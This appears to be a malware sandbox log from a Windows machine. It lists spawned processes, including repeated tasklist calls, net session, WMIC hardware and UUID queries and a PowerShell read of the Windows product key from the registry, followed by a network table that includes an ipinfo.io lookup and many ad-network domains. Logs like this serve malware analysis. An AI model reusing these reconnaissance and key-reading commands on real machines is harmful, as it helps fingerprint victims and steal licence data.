C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\more.com
more +1
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net.exe
net session
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.8.1309269420\1383074398" -childID 7 -isForBrowser -prefsHandle 4528 -prefMapHandle 5460 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ddb64d1-dc6f-4732-ae02-bf2bb50e59a6} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 5508 1fd329a4f58 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.9.1528496629\768241757" -childID 8 -isForBrowser -prefsHandle 3784 -prefMapHandle 5660 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5eb062e6-7c8f-428e-9094-6031a41c8dc1} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4528 1fd329a4c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.10.1193580604\1171908264" -childID 9 -isForBrowser -prefsHandle 5660 -prefMapHandle 3792 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e314fb9f-d861-4465-b30e-99e3b911ac6d} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 5840 1fd33792258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.11.2098448261\2017570811" -childID 10 -isForBrowser -prefsHandle 4468 -prefMapHandle 4460 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b848850-3f2a-4ae2-b961-34a94f183a52} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4444 1fd341a3c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.12.1675892939\1350011074" -childID 11 -isForBrowser -prefsHandle 10468 -prefMapHandle 10464 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b62d922e-a2ec-4cec-a436-1285fd0c60c1} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 10420 1fd3476ff58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.13.1754570692\1971234624" -parentBuildID 20221007134813 -prefsHandle 5084 -prefMapHandle 5080 -prefsLen 26768 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bcf6d9b-213a-4abc-9bc4-24a7c10c2dbb} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 5072 1fd3337bb58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.14.776247035\567234108" -childID 12 -isForBrowser -prefsHandle 10544 -prefMapHandle 10592 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fe4a9cb-a09d-41b9-8a6e-7bac13483456} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 10496 1fd30fdac58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.15.536849232\1366200867" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 10712 -prefMapHandle 10716 -prefsLen 26768 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {56cbbcb0-3440-4357-bd42-88d018e75155} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 10704 1fd353d2b58 utility
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 44.237.149.213:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 213.149.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.178.14:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.178.14:443 | consent.google.com | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | plus.l.google.com | udp |
| GB | 216.58.213.14:443 | plus.l.google.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wildtangent.com | udp |
| US | 104.22.9.18:443 | www.wildtangent.com | tcp |
| US | 8.8.8.8:53 | www.wildtangent.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | www.wildtangent.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | 18.9.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com | udp |
| AU | 192.200.160.253:443 | cdn11.bigcommerce.com | tcp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | cdn11.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.131.236:443 | cdn.cookielaw.org | tcp |
| AU | 192.200.160.253:443 | cdn11.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | cdn.weglot.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.weglot.com.cdn.cloudflare.net | udp |
| US | 104.18.6.32:443 | cdn.weglot.com.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | cdn.weglot.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com | udp |
| US | 8.8.8.8:53 | microapps.bigcommerce.com | udp |
| US | 8.8.8.8:53 | cdn.pbxai.com | udp |
| US | 8.8.8.8:53 | d2ipqnz901lbdy.cloudfront.net | udp |
| US | 8.8.8.8:53 | microapp-cdn.gcp.bigcommerce.net | udp |
| GB | 18.165.227.52:443 | d2ipqnz901lbdy.cloudfront.net | tcp |
| US | 34.117.232.248:443 | microapp-cdn.gcp.bigcommerce.net | tcp |
| US | 8.8.8.8:53 | d2ipqnz901lbdy.cloudfront.net | udp |
| US | 8.8.8.8:53 | microapp-cdn.gcp.bigcommerce.net | udp |
| US | 8.8.8.8:53 | 253.160.200.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.131.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.6.18.104.in-addr.arpa | udp |
| AU | 63.141.128.3:443 | checkout-sdk.bigcommerce.com | tcp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | checkout-sdk.bigcommerce.com.cdn.cloudflare.net | udp |
| AU | 63.141.128.3:443 | checkout-sdk.bigcommerce.com.cdn.cloudflare.net | udp |
| US | 34.117.232.248:443 | microapp-cdn.gcp.bigcommerce.net | udp |
| US | 104.18.6.32:443 | cdn.weglot.com.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 172.64.155.119:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.232.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.128.141.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.155.64.172.in-addr.arpa | udp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | tcp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | tcp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | bes.gcp.data.bigcommerce.com | udp |
| US | 34.111.131.117:443 | bes.gcp.data.bigcommerce.com | udp |
| US | 8.8.8.8:53 | 117.131.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 52.13.108.59:443 | api.wildtangent.com | tcp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 8.8.8.8:53 | api.wildtangent.com | udp |
| US | 52.13.108.59:443 | api.wildtangent.com | tcp |
| US | 8.8.8.8:53 | 59.108.13.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool-vervegroup.adhese.com | udp |
| GB | 13.224.222.55:443 | pool-vervegroup.adhese.com | tcp |
| US | 8.8.8.8:53 | pool-vervegroup.adhese.com | udp |
| US | 8.8.8.8:53 | pool-vervegroup.adhese.com | udp |
| GB | 172.217.169.34:443 | securepubads46.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 55.222.224.13.in-addr.arpa | udp |
| GB | 172.217.169.34:443 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | prebid.ad.smaato.net | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| IE | 63.33.210.103:443 | prebid.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | prebid.ad.smaato.net | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | prebid.ad.smaato.net | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | ghb.adtelligent.com | udp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 107.151.11.18:443 | ghb.adtelligent.com | tcp |
| US | 8.8.8.8:53 | ghb-adtelligent-com.geodns.me | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | ghb-adtelligent-com.geodns.me | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.210.33.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | hb.adscale.de | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 8.8.8.8:53 | report2.hb.brainlyads.com | udp |
| US | 54.84.92.154:443 | report2.hb.brainlyads.com | tcp |
| US | 8.8.8.8:53 | pbs.nextmillmedia.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 54.146.225.145:443 | pbs.nextmillmedia.com | tcp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| IE | 108.129.27.194:443 | hb.yellowblue.io | tcp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | web.hb.ad.cpe.dotomi.com | udp |
| US | 8.8.8.8:53 | hb.adscale.de | udp |
| US | 54.146.225.145:443 | pbs.nextmillmedia.com | tcp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | 18.11.151.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | hb.adscale.de | udp |
| NL | 185.89.210.244:443 | ib.anycast.adnxs.com | tcp |
| DE | 52.29.40.124:443 | hb.adscale.de | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| NL | 89.207.16.146:443 | web.hb.ad.cpe.dotomi.com | tcp |
| DE | 195.201.193.117:443 | shb.richaudience.com | tcp |
| IE | 52.30.102.7:443 | ap.lijit.com | tcp |
| NL | 185.89.210.244:443 | ib.anycast.adnxs.com | tcp |
| DE | 18.192.164.245:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | 154.92.84.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.27.129.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.225.146.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | report2.hb.brainlyads.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | nmm-use1-prod-alb-pbs-server-1662300823.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | report2.hb.brainlyads.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | convex-rr.global.dual.dotomi.weighted.com.akadns.net | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | convex-rr.global.dual.dotomi.weighted.com.akadns.net | udp |
| US | 8.8.8.8:53 | blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
